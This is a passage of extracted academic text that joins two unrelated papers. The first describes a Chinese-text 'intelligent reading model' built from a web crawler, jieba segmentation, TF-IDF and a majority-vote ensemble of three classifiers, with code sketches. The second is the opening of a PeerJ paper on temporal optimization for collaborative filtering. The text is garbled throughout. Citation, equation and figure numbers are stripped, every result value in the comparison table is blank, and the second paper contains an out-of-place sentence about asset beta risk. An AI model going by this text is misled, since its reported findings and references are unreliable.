3) feature extraction: for the data processed in step 2), the tf-idf algorithm is used to extract feature values and generate the word-text matrix.
4) training classifiers: decision tree [ ], bagging [ ] and gaussian bayesian algorithms [ ] are used to train on the word-text matrix generated in step 3), so that three classifiers are obtained.
5) building the model: for the three classifiers obtained in step 4), the principle of "the minority obeys the majority" is adopted to establish the intelligent reading model.
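step 1) relies on a web crawler. the sketch below is a minimal, hypothetical illustration of such a crawler, assuming the requests and beautifulsoup libraries; the url, the css tags and the output file name are placeholders, not the authors' actual targets, and the anti-crawler and tagging details are described in the next section.

```python
# minimal sketch of the data-acquisition crawler; the url, selectors and file
# names are hypothetical placeholders. a browser-like user-agent is sent to
# get past simple anti-crawler checks.
import re
import requests
from bs4 import BeautifulSoup

url = "https://example.com/questions"                      # hypothetical page
headers = {"User-Agent": "Mozilla/5.0"}                    # simulate browser access

html = requests.get(url, headers=headers, timeout=10).text
soup = BeautifulSoup(html, "html.parser")

# extract question/answer blocks; the tag name "div" is a placeholder
records = [div.get_text(" ", strip=True) for div in soup.find_all("div")]
records = [re.sub(r"\s+", " ", r) for r in records if r]   # normalize whitespace

with open("data.txt", "w", encoding="utf-8") as f:
    for r in records:
        f.write("[qa] " + r + "\n")                        # fixed tag name for later processing
```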
iii. description of the modeling process

this paper constructs an intelligent reading model as follows. firstly, a python network crawler is used for data acquisition. then jieba word segmentation and the tf-idf weight algorithm are adopted to preprocess the sample data. finally, the feature values are extracted, the classifiers are trained, and the model is established. the detailed operations are described below.

a. data acquisition

there is a wide variety of text on the web. because the amount of data is large, python web crawlers are usually used to obtain it. some websites, however, have anti-crawler mechanisms, so while designing a web crawler it is necessary to simulate browser access. by analyzing the web page source code, regular expressions are used to extract the required data; library modules such as beautifulsoup, requests and re can be used to crawl it. the crawled content consists of the questions and all of their corresponding answers. finally, the acquired data is stored in a txt file and given a fixed tag name, so that it is convenient for later data processing.

b. data processing

analysis of the acquired data reveals a lot of noise in the text. for example, the word segmentation is inaccurate, and there are a large number of stop words. if this noise is carried into the word frequency statistics, it will not only reduce the processing speed but also greatly affect the experimental results. therefore, the first important task is to preprocess the data. data preprocessing is divided into three steps: generating and loading the custom dictionary, chinese word segmentation, and stop-word filtering, as shown in figure .

figure . flow of data preprocessing (input the acquired data → custom dictionary generation and loading → chinese word segmentation → stop-word filtering → output keywords)

1) generation and loading of the custom dictionary. the number of words included in the jieba dictionary is limited, which leads to inaccurate text segmentation; for instance, people's names and place names are often segmented incorrectly. a custom dictionary is therefore needed to improve the accuracy of word segmentation. the information entropy algorithm is used to find new words and generate the custom dictionary, which is then loaded into the code to improve the precision of word segmentation.

2) chinese word segmentation. after the above step is completed, word segmentation begins. this paper adopts jieba, a chinese word segmentation module developed in python, to segment all the chinese data sets. it combines rule-based and statistics-based methods [ ]. in the rule-based method, segmentation relies on an existing dictionary and manual rules such as forward maximum matching, backward maximum matching and bidirectional maximum matching. for example, for the sentence "shanghai tap water comes from the sea", forward maximum matching scans from front to back, keeps only words that exist in the dictionary, and makes each word as long as possible, so the result "shanghai / tap water / from / sea" is obtained. this kind of method is simple and easy to implement, and the amount of data required is low. the statistics-based method summarizes the probability distribution of words and the common collocations between words from a large, manually labeled corpus, and supervised learning is used to train the word segmentation model. for the same sentence "shanghai tap water comes from the sea", the most basic statistics-based segmentation tries all possible segmentation schemes, since between any two characters there is either a cut or no cut. for every possible segmentation scheme, its probability is estimated from the corpus, and the scheme with the greatest probability is retained. obviously, "shanghai / tap water / come from / sea" is more likely than "shanghai tap / water / come from / sea", because "shanghai" and "tap water" appear more frequently in the tagged corpus than "shanghai tap" and "water". part of the segmentation result is shown in figure .

figure . participle screenshot

from figure , it can be seen that there are a large number of meaningless modal particles in the segmentation results, which will greatly influence the final experimental results.
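as a concrete illustration of this preprocessing step, the sketch below shows how jieba segmentation with a custom dictionary might look in python. it is a minimal sketch rather than the authors' code: the file names user_dict.txt and corpus.txt are hypothetical, and only the library calls load_userdict and lcut are assumed from jieba.

```python
# minimal sketch of chinese word segmentation with jieba and a custom dictionary.
# the file names are hypothetical placeholders.
import jieba

# load the custom dictionary generated by the new-word discovery step,
# so names and domain terms are segmented as single words
jieba.load_userdict("user_dict.txt")

with open("corpus.txt", encoding="utf-8") as f:
    text = f.read()

# cut the text into a list of words (jieba combines dictionary rules
# with a statistical model for words not in the dictionary)
tokens = jieba.lcut(text)
print(tokens[:20])
```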
therefore, it is necessary to filter out the stop words.

3) filtering stop words. stop words [ ] are words that appear frequently in the text without carrying practical meaning, such as modal particles, adverbs, prepositions and conjunctions. in order to save storage space and improve search efficiency, these meaningless stop words must be filtered out before the text is processed. to identify stop words accurately, the following indicators can be used to measure the usefulness of a word.

a) term frequency (tf). tf is a simple evaluation function whose value is the number of times a word occurs in the training set. the theoretical assumption behind it is that a word appearing very frequently across the text is generally regarded as a noise word.

b) document frequency (df). similar to term frequency, the theoretical assumption is that a word appearing in a large proportion of the texts is generally regarded as a noise word.

part of the resulting stop-word list is shown in table .

table i. stop word list (partial)
preposition: on, in, at, under, beside, behind, to, over, with
pronoun: everyone, everything, everywhere, ...
adverbs: so, still, therefore, moreover, however

as shown in table , the filtered stop words are used to generate a stop-word list, which is loaded into the code. each word in the segmentation result is then matched against the stop-word list; if the match succeeds, the word is deleted from the segmentation result.

c. feature extraction

after the preprocessing steps above, the stop words have been removed, but a sentence still contains a large number of words, which complicates text vectorization. the main purpose of feature extraction is therefore to minimize the number of words to be processed without changing the core content of the original text, so as to reduce the dimension of the vector space, simplify the calculation, and improve the speed and efficiency of text processing. commonly used methods include term frequency-inverse document frequency (tf-idf), information gain [ ], chi-square statistics, and so on. here the tf-idf algorithm is used to transform keyword information into a weight vector. the steps are as follows.

1) calculate the term frequency, i.e., the tf weight:

$$\mathrm{tf} = \frac{\text{number of times a word appears in the text}}{\text{total number of words in the text}} \qquad ( )$$

2) calculate the inverse document frequency, i.e., the idf weight. first, a corpus is built to simulate the language environment. the larger the idf, the more concentrated the feature is in a few texts, and the better the word can distinguish the content of a text:

$$\mathrm{idf} = \log\left(\frac{\text{total number of texts in the corpus}}{\text{number of texts containing the word}}\right) \qquad ( )$$

3) calculate the term frequency-inverse document frequency (tf-idf) value:

$$\text{tf-idf} = \mathrm{tf} \times \mathrm{idf} \qquad ( )$$

the larger the tf-idf value, the more important the word is. the tf-idf value of each word in the text is calculated and sorted; the first six keywords of each question and its corresponding answer are found in turn, and the weights of these six keywords are returned. if there are fewer than six keywords, the remaining weights are given a default value.

by using the tf-idf algorithm, the text information is vectorized and the word-text matrix is obtained:

$$\begin{pmatrix} w_{11} & w_{12} & \cdots & w_{1n} \\ w_{21} & w_{22} & \cdots & w_{2n} \\ \vdots & \vdots & & \vdots \\ w_{m1} & w_{m2} & \cdots & w_{mn} \end{pmatrix}$$

hereby, $t_i$ ($i = 1, 2, \ldots, n$) is a feature item of the documents $d_1, \ldots, d_m$, and $w_{ij}$ is the weight of feature item $t_j$ in document $d_i$, calculated as

$$w_{ij} = \text{tf-idf} = \mathrm{tf} \times \mathrm{idf} \qquad ( )$$
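to make the vectorization step concrete, the following sketch builds a small word-text matrix with scikit-learn's TfidfVectorizer. it is an illustrative sketch rather than the authors' implementation: the toy documents are invented, and scikit-learn uses a smoothed idf variant, so the exact weights differ slightly from the formulas above.

```python
# sketch: build a tf-idf word-text matrix for a few toy documents and list
# the six highest-weighted keywords of the first document.
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer

docs = [
    "shanghai tap water comes from the sea",       # toy stand-ins for the
    "the student reads the legal literature",      # segmented question/answer texts
    "the crawler stores questions and answers",
]

vectorizer = TfidfVectorizer()
matrix = vectorizer.fit_transform(docs)            # shape: (documents, vocabulary)

row = matrix[0].toarray().ravel()
top = np.argsort(row)[::-1][:6]                    # indices of the six largest weights
terms = vectorizer.get_feature_names_out()
print([(terms[i], round(row[i], 3)) for i in top if row[i] > 0])
```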
d. training classifiers

in this paper, the word-text matrix is trained with three algorithms: decision tree, bagging and gaussian bayes. the specific steps of each algorithm are described below.

1) decision tree. the decision tree algorithm mainly includes feature selection and decision tree generation. feature selection is based on the information gain over the data set, and the decision tree is then generated recursively from the selected features using the id3 algorithm [ ]. the specific steps are as follows.

a) calculate the information entropy. in order to select features with good classification ability for the training data, the information gain is introduced. let d be the set of training tuples; its entropy is

$$\mathrm{info}(D) = -\sum_{i=1}^{m} p_i \log_2 p_i \qquad ( )$$

$$p_i = \frac{\text{number of elements in category } i}{\text{total number of training tuples}} \qquad ( )$$

hereby, m represents the total number of categories and $p_i$ represents the probability that category i appears in the whole training set. entropy measures the uncertainty of a random variable; its practical meaning here is the average amount of information required to determine the class label of a tuple in d. the larger the entropy, the greater the uncertainty of the variable. if the training set d is partitioned according to a characteristic attribute a, the expected information of d (i.e., the conditional entropy of d given a) is

$$\mathrm{info}_A(D) = \sum_{j=1}^{v} \frac{|D_j|}{|D|}\,\mathrm{info}(D_j) \qquad ( )$$

where $D_j$ is the j-th partition induced by attribute a, and v is the number of distinct values of attribute a.

b) calculate the information gain, which is the difference between the two entropies:

$$\mathrm{gain}(A) = \mathrm{info}(D) - \mathrm{info}_A(D) \qquad ( )$$

gain(a) represents the amount of information obtained by splitting on attribute a as a node; the more information, the more important a is.

c) the id3 algorithm is used to establish each child node in the tree: among the candidate features of the data set, it selects the feature with the maximum information gain as the judgment node, which becomes a sub-node in the tree.

d) using recursion, steps a) to c) are repeated to establish the complete decision tree.
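a small numeric sketch of the entropy and information-gain computation is given below. it is illustrative only: the toy labels and the candidate attribute are invented, and numpy is assumed; the code simply evaluates info(d), info_a(d) and gain(a) for a single attribute.

```python
# sketch: entropy and information gain for one candidate attribute,
# following info(D), info_A(D) and gain(A) above. toy data only.
import numpy as np

def entropy(labels):
    _, counts = np.unique(labels, return_counts=True)
    p = counts / counts.sum()
    return -np.sum(p * np.log2(p))

def information_gain(labels, attribute_values):
    total = entropy(labels)                                    # info(D)
    cond = 0.0
    for v in np.unique(attribute_values):
        subset = labels[attribute_values == v]
        cond += len(subset) / len(labels) * entropy(subset)    # info_A(D)
    return total - cond                                        # gain(A)

labels = np.array(["yes", "yes", "no", "no", "yes", "no"])
attr   = np.array(["a",   "a",   "b",  "b",  "a",   "a"])     # candidate attribute values
print("info(D) =", round(entropy(labels), 3))
print("gain(A) =", round(information_gain(labels, attr), 3))
```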
2) bagging (integrated decision trees). bagging is a technique of repeated sampling from the data according to a uniform probability distribution. the algorithm fits each member classifier of the ensemble on a different training set, where each training set is drawn by bootstrap sampling, i.e., random sampling with replacement. bagging can therefore improve the accuracy of unstable models and reduce the degree of over-fitting. the final result of the algorithm is a series of prediction functions that are combined into one prediction function by voting or averaging. the process is shown in figure , and the steps are as follows.

a) the bootstrap [ ] method is used to select n training samples from the sample set to form a training set. this process is executed k times, so that k subsets {t1, t2, ..., tk} are selected.

b) the k sample subsets are each trained on all attributes of their own training data, and k classification models are obtained.

c) with the classification models obtained above, the prediction {p1, p2, ..., pk} of each model is computed.

d) the values {p1, p2, ..., pk} of the models are combined by averaging, and the final result is output. the averaging formula is

$$p(x) = \frac{1}{k}\sum_{i=1}^{k} p_i(x) \qquad ( )$$

hereby, $p_i$ is the prediction of model i and k is the number of sampled training subsets.

figure . bagging process (training set → bootstrap sampling into subsets t1 ... tk → classification models c1 ... ck → forecasts p1 ... pk → combined final result)
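the bootstrap-and-average loop can be sketched in a few lines. the example below is a hypothetical illustration that uses scikit-learn decision trees as the member classifiers; the random feature matrix stands in for the tf-idf word-text matrix.

```python
# sketch: bagging by hand - k bootstrap samples, k decision trees,
# predictions combined by averaging as in the formula above. toy data only.
import numpy as np
from sklearn.tree import DecisionTreeClassifier

rng = np.random.default_rng(0)
X = rng.random((100, 20))            # toy stand-in for the word-text matrix
y = rng.integers(0, 2, size=100)     # toy binary labels

k = 10
models = []
for _ in range(k):
    idx = rng.integers(0, len(X), size=len(X))   # bootstrap: sample with replacement
    models.append(DecisionTreeClassifier().fit(X[idx], y[idx]))

# average the k predicted class probabilities, then take the most likely class
probs = np.mean([m.predict_proba(X) for m in models], axis=0)
bagged_pred = probs.argmax(axis=1)
print("training accuracy of the bagged ensemble:", (bagged_pred == y).mean())
```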
3) gaussian bayes algorithm. compared with the decision tree and bagging algorithms, its greatest advantage is that, even when a large-scale training set is selected, the gaussian bayes algorithm uses only a relatively small number of features for each item, and training and classification reduce to arithmetic on the feature probabilities. therefore, the gaussian bayes algorithm is fast when training on large amounts of data. the flow of the algorithm is shown in figure .

figure . gaussian bayesian algorithm flow (preparation stage: identifying attributes and acquiring training samples; classifier training stage: calculating p(yi) and the conditional probabilities; application stage: calculating p(x|yi)p(yi) and judging the category)

as shown in figure , the entire algorithm flow can be divided into three phases. the first is the preparation stage. this stage determines the characteristic attributes according to the specific situation and divides each feature attribute appropriately; some of the items are then classified manually to form a training sample set. the input of this phase is all the data to be classified, and the output is the feature attributes and the training samples. this is the only stage of the whole naive bayesian classification that must be completed manually, and the quality of the resulting classifier is strongly affected by the chosen feature attributes, their division, and the training samples.

the second is the classifier training stage, which generates the classifier. firstly, the occurrence frequency of each class in the training samples is calculated; then the conditional probability of each feature attribute given each category is calculated; finally, the results are recorded. the input is the feature attributes and the training samples, and the output is the classifier.

the third is the application stage. the task at this stage is to classify new items using the classifier. the input is the classifier and the item to be classified, and the output is the mapping between the items to be classified and the categories. the specific steps are described as follows.

a) let $x = \{x_1, x_2, \ldots, x_m\}$ be an item to be classified, where each $x_i$ is a characteristic attribute of x.

b) suppose there is a set of categories $\{y_1, y_2, \ldots\}$.

c) calculate the conditional probability $p(x_i \mid y_j)$ of each attribute under each category:

$$p(x_i \mid y_j) \in \{p(x_1 \mid y_1), \ldots, p(x_m \mid y_1),\; p(x_1 \mid y_2), \ldots, p(x_m \mid y_2)\} \qquad ( )$$

d) if $p(x \mid y_k) = \max_j\{p(x \mid y_j)\}$, then x is assigned to category $y_k$.

e) according to bayes' theorem and the naive independence assumption, the following holds:

$$p(x \mid y_j)\,p(y_j) = p(x_1 \mid y_j)\,p(x_2 \mid y_j)\cdots p(x_m \mid y_j)\,p(y_j) = p(y_j)\prod_{i=1}^{m} p(x_i \mid y_j) \qquad ( )$$

f) the class that maximizes the value of $p(x \mid y_i)\,p(y_i)$ is found, and the item to be classified falls into this category.

e. building the model

the three algorithms above are used to construct three models. then the principle of "the minority is subordinate to the majority" is used to combine them into a new model, called the intelligent reading model. this principle means that if a data item is classified by the three models and two of the three outputs agree, the majority label is taken as the final result for that item.
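putting the pieces together, the sketch below trains the three classifiers on a word-text matrix and combines their predictions by majority vote. it is a hedged illustration, not the authors' code: scikit-learn's DecisionTreeClassifier, BaggingClassifier and GaussianNB are assumed as stand-ins for the three algorithms described above, and the data is synthetic.

```python
# sketch: train decision tree, bagging and gaussian bayes classifiers,
# then combine their predictions by "the minority obeys the majority".
import numpy as np
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import BaggingClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, f1_score

rng = np.random.default_rng(1)
X = rng.random((300, 50))             # stand-in for the tf-idf word-text matrix
y = rng.integers(0, 2, size=300)      # stand-in labels (relevant / not relevant)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=1)

models = [
    DecisionTreeClassifier(random_state=1).fit(X_tr, y_tr),
    BaggingClassifier(n_estimators=10, random_state=1).fit(X_tr, y_tr),  # bags decision trees
    GaussianNB().fit(X_tr, y_tr),
]

# majority vote over the three predictions (no ties with 3 voters and 2 classes)
votes = np.stack([m.predict(X_te) for m in models])          # shape (3, n_samples)
combined = (votes.sum(axis=0) >= 2).astype(int)

print("accuracy :", accuracy_score(y_te, combined))
print("f-measure:", f1_score(y_te, combined))
```

the same accuracy and f-measure functions used at the end of this sketch correspond to the two evaluation indicators defined in the verification section that follows.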
iv. verification and analysis of the model

the data from the testing set are input into the intelligent reading model and the processed results are analyzed. the quality of the model is measured by two technical indicators: accuracy and the f-measure value. the two-dimensional confusion matrix is shown in table . the meaning of "the forecast is wrong, the actual is wrong (tn)" is that the actual label category of the data is "wrong" and it is still predicted as "wrong". based on the two-dimensional confusion matrix in table , the accuracy rate and the f-measure are defined as follows.

table ii. two-dimensional confusion matrix
forecast positive, actual positive: tp
forecast positive, actual wrong: fp
forecast wrong, actual positive: fn
forecast wrong, actual wrong: tn

$$\mathrm{accuracy} = \frac{TP + TN}{TP + TN + FN + FP} \qquad ( )$$

$$\text{f-measure} = \frac{2\,TP}{2\,TP + FP + FN} \qquad ( )$$

as shown in the accuracy formula, the accuracy rate is the proportion of successfully predicted data among all predicted data, where a successful prediction means that the predicted value is the same as the actual value; it counts both kinds of labels, "the forecast is positive, the actual is positive (tp)" and "the forecast is wrong, the actual is wrong (tn)". when users ask questions, however, they only want the right answers, so the tn label is not essential. as shown in the f-measure formula, the f-measure is a comprehensive evaluation index of the accuracy rate and the recall rate; because it does not include the tn label, it is often used to evaluate classification models. accuracy is an objective evaluation index, but it does not always reflect the quality of an algorithm; especially when the positive and negative samples are imbalanced, the accuracy index has serious defects. the most common form of the f-measure is the weighted harmonic average of the precision and the recall (the recall rate measures coverage). because the f-measure considers precision and recall together, it effectively avoids the problem of unbalanced data distribution, and therefore reflects the quality of an algorithm better than accuracy alone. the higher the f-measure value, the better the classification results of the corresponding algorithm.

combining the three algorithms (decision tree, bagging and gauss bayes), the results of the combination algorithm and of each single algorithm are shown in table .

table iii. comparison of prediction results (decision tree, bagging, gauss bayesian, combination algorithm)
accuracy: . , . , . , .
f-measure: . , . , . , .

the table shows that the accuracy of the combination algorithm is higher than the accuracy of each of the three separate algorithms, and its f-measure value is likewise higher than the f-measure values of the three separate algorithms. whether measured by accuracy or by f-measure, the result of the combined algorithm is better than that of the three separate algorithms. therefore, the intelligent reading model is based on the combination of the decision tree, bagging and gauss bayesian algorithms. to further verify the superiority of the method, experiments are carried out on data sets of increasing size; the results are shown in figure and figure .

figure . accuracy comparison diagram (accuracy rate of the combination algorithm, decision tree and gauss bayesian algorithm versus the amount of data)

figure . f-measure comparison (f-measure of the combination algorithm, decision tree and gauss bayesian algorithm versus the amount of data)

in figure , the x-axis represents the amount of data in the experiment and the y-axis represents accuracy; compared with the decision tree, bagging and gauss bayes algorithms, the combination algorithm has slightly better accuracy. in figure , the x-axis represents the amount of data and the y-axis represents the f-measure; the f-measure of the combined algorithm is clearly superior to that of the other three separate algorithms.

v.
conclusion the reading model constructed in this paper makes reading more intelligent. aiming at the problem of natural language input, the corresponding answer can be given according to the existing txt content. according to the experimental data, it can be concluded that the intelligent reading model based on the combination of decision tree, bagging and gauss bayesian algorithm has a good classification ability. references [ ] xi xuefeng, zhou guodong. a study of deep learning for natural language processing [j]. journal of automation! ( ): - [ ] chen lian. research and application of key interactive technology based on web intelligent education platform [d]. graduate school of chinese academy of sciences (chengdu institute of computer application). [ ] han dongxu, chang baobao. domain adaptability method of chinese word segmentation model [j]. journal of computer science, china ( ): - . [ ] yang bin, han qingwen, lei min, zhang yapeng, liu xiangguo, yang yaqiang, ma xuefeng. short text classification algorithm based on improved tf-idf weight [j]. journal of chongqing university of technology (natural science) ( ): - . [ ] qian cheng, yang xiaolan, zhu fuxi. python-based web crawler technology [j]. heilongjiang science and technology information ( ): . [ ] wang daoming, lu changhua, jiang weiwei, xiao mingxia, li inevitable. research on decision tree svm multiple classification method based on particle swarm optimization algorithm [j]. journal of electronic measurement and instruments ( ): - . [ ] bi kai, wang xiaodan, yao xu, zhou jindeng. an adaptive selective integration based on bagging and confusion matrix [j]. chinese journal of electronic science (ej). ( ): - . [ ] zhu mingmin. study on bayesian network structure learning and reasoning [d]. xi'an university of electronic science and technology. [ ] zan hongying, zuo weisong, zhang kunli, wu yunfang. a study on emotion analysis combined with rules and statistics [j]. computer engineering and science ( ): - . [ ] gu yijun, fan xiaozhong, wang jianhua, wang tao, huang weijin. automatic selection of chinese stops word list [j]. beijing institute of technology proceedings ( ): - . [ ] liu qinghe, liang zhengyou. a feature selection method based on information gain [j]. computer engineering and applications ( ): - + . [ ] huang yuda, fan taihua. analysis and optimization of decision tree id algorithm [j]. computer engineering and design! ( ): - . [ ] liu jian, wu yi, tan lu. improvement of bootstrap method for self- help sampling [j]. mathematical theory and application ( ): - . submitted august accepted november published december corresponding author nurfadhlina mohd sharef, nurfadhlina@upm.edu.my academic editor faizal khan additional information and declarations can be found on page doi . /peerj-cs. copyright al-hadi et al. distributed under creative commons cc-by . open access latent based temporal optimization approach for improving the performance of collaborative filtering ismail ahmed al-qasem al-hadi , nurfadhlina mohd sharef , md nasir sulaiman , norwati mustapha and mehrbakhsh nilashi faculty of ocean engineering technology and informatics, universiti malaysia terengganu, kuala nerus, terengganu, malaysia faculty of computer science and information technology, universiti putra malaysia, serdang, selangor, malaysia faculty of computing, universiti teknologi malaysia, skudai, johor, malaysia abstract recommendation systems suggest peculiar products to customers based on their past ratings, preferences, and interests. 
these systems typically utilize collaborative filtering (cf) to analyze customers’ ratings for products within the rating matrix. cf suffers from the sparsity problem because a large number of rating grades are not accurately determined. various prediction approaches have been used to solve this problem by learning its latent and temporal factors. a few other challenges such as latent feedback learning, customers’ drifting interests, overfitting, and the popularity decay of products over time have also been addressed. existing works have typically deployed either short or long temporal representation for addressing the recommendation system issues. although each effort improves on the accuracy of its respective benchmark, an integrative solution that could address all the problems without trading off its accuracy is needed. thus, this paper presents a latent-based temporal optimization (lto) approach to improve the prediction accuracy of cf by learning the past attitudes of users and their interests over time. experimental results show that the lto approach efficiently improves the prediction accuracy of cf compared to the benchmark schemes. subjects artificial intelligence, data mining and machine learning, data science keywords temporal factorization, recommender systems, collaborative filtering, drift, decay, matrix factorization introduction recommendation systems are some of the most powerful methods for suggesting products to customers based on their interests and online purchases (jonnalagedda et al., ; lin, li & lian, ; nilashi, bin ibrahim & ithnin, ; nilashi et al., ; zhang et al., b). in terms of personalization of recommendations, one of the most prevalently used methods is collaborative filtering (cf) (nilashi, bin ibrahim & ithnin, ; sardianos, ballas papadatos & varlamis, ; nilashi et al., ; wu et al., ). in cf, personalized prediction of products depends on the latent features of users in a rating matrix. however, the cf prediction accuracy decreases if the rating matrix is sparse (zhang et al., a; li & chi, ; idrissi & zellou, ). several types of factorization techniques such as baseline, how to cite this article al-hadi iaa-q, sharef nm, sulaiman mn, mustapha n, nilashi m. . latent based temporal optimization approach for improving the performance of collaborative filtering. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:nurfadhlina@upm.edu.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. singular value decomposition (svd), matrix factorization (mf), and neighbors-based baseline have been exploited to address the problem of data sparsity (mirbakhsh & ling, ; al-hadi et al., b) by predicting the missing rating scores in the rating matrix. similarly, various factorization-based techniques including the use of latent (vo, hong & jung, ; nguyen & do, ) and baseline factors (koenigstein, dror & koren, ) (such as svd (wang et al., )) have been proposed to improve the recommendation accuracy. nevertheless, an unaddressed problem is that a part of the rating scores is misplaced from its original cells while streaming into the memory. this misplacement decreases the meticulousness of the latent feedback. 
a method based on ensemble divide and conquer (al-hadi et al., ) was adopted to solve the misplacement problem besides addressing the customers’ preferences drift and popularity decay. integration of temporal preferences with factorization methods to solve the sparsity issue has yielded a better performance compared to basic factorization approaches (al-hadi et al., b; li, xu & cao, ; nilashi et al., ; nilashi, bin ibrahim & ithnin, ). the temporal dynamics approach (koren, ) separates the time period of preferences into static digit of bins and extracts a universal weight according to the stochastic gradient descent method to reduce overfitting. nonetheless, the learned universal weight using the temporal dynamics approach has limitations with respect to how it personalizes and represents the fluctuating temporal preferences. the temporal interaction approach (ye & eskenazi, ) enhanced the effectiveness of cf recommender systems by combining the latent factors, short-term preferences, and long-term preferences. the shrunk neighbor approach is applied to obtain clients’ short-term feedbacks (koren, ). this approach detects overfitting when there is a fluctuating scale in the rating scores. for example, in the rating matrix from the movielens dataset, the actual score is smaller than the predicted values. in this theory, the risk of each asset is measured with its beta value (which is the criterion of systematic risk). the fluctuating scale is in the range of – , whereas the anticipated rating scores are [ . ; . ; . ; ]. compared to other temporal approaches (e.g., the short-term based latent technique (yang et al., )), the temporal interaction approach (ye & eskenazi, ) efficiently anticipates performance of cf. nevertheless, problems such as drifting customers’ preferences and popularity decay (e.g., deterioration of marketability of goods) still pose a significant challenge (ye & eskenazi, ). the long temporal-based factorization approach addresses the popularity decay issue (al- hadi et al., b) while the short temporal-based factorization approach (al-hadi et al., a) addresses the drift issue not solved by previous short-term based approaches. these temporal approaches improve the performance of cf but they are characterized by low accuracy. in view of the aforementioned, this paper presents a latent-based temporal optimization (lto) approach to solve the significant limitations of these temporal approaches. as optimization algorithms have proven successful in various areas such as healthcare (zainal et al., )and document processing al-badarneh amer ( ), we extend our earlier work (al-hadi et al., a) and provide a detailed analysis of the proposed approach. the contributions of this paper are summarised below. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • a comprehensive review of cf-based recommender system techniques. • a proposed lto approach that minimizes overfitting and learns by integrating long and short-term features with the baseline and factorization features. • an lto approach that learns the drift in the users’ interests through an improved rating score prediction. this is achieved by integrating the long and short-term features of users and items with their baseline and factorization features. • an lto approach that solves the sparsity issue by combining the learning output of the overfitting, drift, and decay. 
• a comparison of lto’s performances with other factorization and temporal-based factorization approaches. in summary, the proposed approach has superior performance as it improves the prediction accuracy in the cf technique by learning accurate latent effects of the temporal preferences of users. the novel features of the lto approach are as follows: • it provides a personalized temporal weighting which is incorporated in matrix factorization to reduce data sparsity error. • it combines time convergence and personalized duration to accommodate consumer’s preferences drifting in the personalized recommendation system. • it utilizes the bacterial foraging optimization algorithm (bfoa) to accurately learn the personalized temporal weights by regularizing the overfitted predicted scores in the rating matrix and to track the factors of drift and decay. the rest of this paper is sectioned as follows: ‘related works’ reviews the past works related to factorization approaches and temporal preferences. in ‘latent-based temporal optimization approch’, lto is elaborated, followed by experimental analysis in ‘experimental settings’. ‘experimental results’ discusses the experimental results. the final section (‘conclusion’) provides a summary and indicates possible future works. related works collaborative filtering cf is a technique developed to make automated predictions (filtering) about the interests of a customer by gathering preferences or rating scores from several other customers (collaborating). the primary idea of the cf approach is that if a user (say x) shares an attitude with another user (y) on a subject, x is more likely to share y’s attitude on a different issue when compared to other randomly chosen users. cf is one of the most implemented techniques used in the design of recommendation systems due to its low computational requirement (jonnalagedda et al., ; sardianos, ballas papadatos & varlamis, ; alhijawi & kilani, ). it utilizes to find similar users or items and calculate predicted rating scores according to ratings of similar users. in addition, cf provides customized recommendations using the similarity values of customers and common preferences while the score of the active customer is placed in the rating score matrix. changes are being made in the personalized al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. recommendation to suggest products to customers based on their tastes. this constitutes a well-established methodology with a wide range of application. in the cf technique, a forecast is achieved in three steps. the main step is estimating the values of similarity amongst common clients and the target customer with the use of similarity functions, such as the cosine function (nilashi et al., ; alhijawi & kilani, ). the rating scores supplied by the target client and the similarity values are applied in the next procedure to estimate the expected score of the product using the prediction function. the final step estimates the precision of the forecast by applying the root mean squared error (rmse) function (nilashi et al., ). cf suffers from the data sparsity problem which occurs due to a soaring proportion of undetermined scores in the users’ voting matrix. this problem is solved using several prediction methods such as neighbors-based baseline (bell & koren, ) and matrix factorization (koren, ; nguyen & do, ). 
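the three-step forecast just described (similarity, prediction, error) can be sketched compactly. the code below is an illustrative numpy sketch of user-based cf with cosine similarity and rmse, under the assumption of a small dense rating matrix in which zeros mark missing ratings; it is not the authors' implementation.

```python
# sketch: user-based collaborative filtering with cosine similarity and rmse.
# zeros in the matrix mark unrated items; values are the 1-5 rating scores.
import numpy as np

ratings = np.array([           # rows = users, columns = items (toy data)
    [5, 3, 0, 1],
    [4, 0, 0, 1],
    [1, 1, 0, 5],
    [0, 1, 5, 4],
], dtype=float)

def cosine_sim(a, b):
    mask = (a > 0) & (b > 0)                   # compare only co-rated items
    if not mask.any():
        return 0.0
    return a[mask] @ b[mask] / (np.linalg.norm(a[mask]) * np.linalg.norm(b[mask]))

def predict(user, item):
    sims, neigh = [], []
    for v in range(len(ratings)):
        if v != user and ratings[v, item] > 0:
            sims.append(cosine_sim(ratings[user], ratings[v]))
            neigh.append(ratings[v, item])
    sims, neigh = np.array(sims), np.array(neigh)
    if sims.sum() == 0:
        return ratings[ratings > 0].mean()     # fall back to the global mean
    return sims @ neigh / sims.sum()           # similarity-weighted average

def rmse(pairs):
    return np.sqrt(np.mean([(predict(u, i) - r) ** 2 for u, i, r in pairs]))

print("predicted score for user 0, item 2:", round(predict(0, 2), 2))
print("rmse on held-out pairs:", round(rmse([(1, 1, 4.0), (3, 0, 2.0)]), 2))
```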
